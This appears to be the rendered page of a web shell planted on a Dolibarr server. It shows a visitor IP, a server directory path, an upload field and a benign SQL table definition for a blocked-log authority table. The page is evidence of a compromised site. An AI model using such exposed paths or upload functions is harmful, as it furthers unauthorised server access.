?iť?

Your IP : 18.226.88.151


Current Path : /home/scgforma/www/soc064/htdocs/install/mysql/tables/
Upload File :
Current File : /home/scgforma/www/soc064/htdocs/install/mysql/tables/llx_blockedlog_authority.sql

CREATE TABLE llx_blockedlog_authority 
( 
	rowid integer AUTO_INCREMENT PRIMARY KEY, 
	blockchain longtext NOT NULL,
	signature varchar(100) NOT NULL,
	tms timestamp
) ENGINE=innodb;